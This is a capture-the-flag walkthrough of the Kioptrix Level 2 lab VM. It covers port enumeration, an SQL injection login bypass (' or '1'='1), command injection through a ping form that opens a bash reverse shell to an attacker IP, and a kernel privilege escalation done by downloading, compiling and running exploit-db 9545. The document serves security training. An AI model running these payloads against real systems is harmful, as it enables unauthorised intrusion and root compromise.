Coffee Difficulty Rating:

Author Description

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Service Enumeration

Port Service Version Detection

TCP: 22

SSH

OpenSSH 3.9p1 (protocol 1.99)

TCP: 80

HTTP

Apache httpd 2.0.52 ((CentOS))

TCP: 111

RPC Bind

N/A

TCP: 443

HTTPS

Apache httpd 2.0.52 ((CentOS))

TCP: 631

CUPS

CUPS 1.1

TCP: 946

RPC

RPC

TCP: 3306

MySQL

MySQL (unauthorized)

Web Application Investigation

The web form /index.php was vulnerable to SQL injection, entering the username admin and the password ' or '1'=' successfully bypassed auth.

SQL Injection Auth Bypass

SQL Injection - Why does ' or '1'='1 work ?

The web application is expecting the SQL query: $query = "SELECT * FROM users WHERE username = 'admin' AND password='blah'"; Entering the above injects the statement after the password='blah' and before the closing ";, the entire sql injection query looks like: $query = "SELECT * FROM users WHERE username = 'admin' AND password=' or '1'='1";" 1 = 1 will always be 1, thus the statement will return true, allowing an attacker to authenticate as admin. The above injection statement correctly closes the sql syntax, however it is possible to comment out the rest of the sql statement using: -- -

Command Injection

The above authentication bypass exposed a web form vulnerable to command injection, the form filtering only checks for the presence of the ping command with no filtering to prevent an attacker tacking a comment on the end using ; insert-command-here.

Non privileged shell

A non privileged reverse shell was obtained using:

ping google.com; bash -i >& /dev/tcp/192.168.221.139/443 0>&1
[root:~]# nc -n -v -l -p 443
listening on [any] 443 ...
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.157] 32770
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$

Local privilege Escalation

bash-3.00$ uname -ar
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ cd /tmp
bash-3.00$ wget https://www.exploit-db.com/download/9545 --no-check-certificate
--02:27:58--  https://www.exploit-db.com/download/9545
           => `9545'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]

    0K .........                                                30.10 MB/s

02:27:58 (30.10 MB/s) - `9545' saved [9785]

bash-3.00$ mv 9545 sock_sendpage.c                             
bash-3.00$ gcc -o sock_sendpage sock_sendpage.c
bash-3.00$ ./sock_sendpage
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#

Thanks for the VM :)